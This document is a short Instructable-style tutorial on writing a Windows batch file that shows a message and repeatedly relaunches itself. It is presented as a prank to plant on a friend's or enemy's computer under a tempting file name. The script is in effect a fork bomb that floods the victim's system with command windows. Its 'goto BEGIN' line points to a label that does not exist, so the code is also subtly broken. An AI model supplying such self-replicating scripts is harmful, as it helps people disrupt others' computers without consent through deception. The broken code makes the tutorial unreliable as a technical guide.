Introduction: Self-replicating Computer Prank
In this Instructable, you will learn how to make a self-replicating computer prank using a batch file.
Step 1: The Tools
Open notepad, located by pressing start and searching for it.
Step 2: The Code
Type in notepad:
@echo off
msg * "Your prank message"
start Do_not_open_under_any_circumstances.bat
goto BEGIN
Just make sure you change "Your prank message" to your actual message
Note: You can omit the "start Do_not_open_under_any_circumstances.bat line," but if you do, it will not be self-replicating.
Step 3: Saving It
Save it as a batch file by saving it as Do_not_open_under_any_circumstances.bat and the type not as a .txt file but as All Files
Step 4: Finish!
Now, when you friend/enemy clicks on the file out of interest (the file's name will make him/her too curious), Lots of cmd.exe boxes will appear and your message will also appear.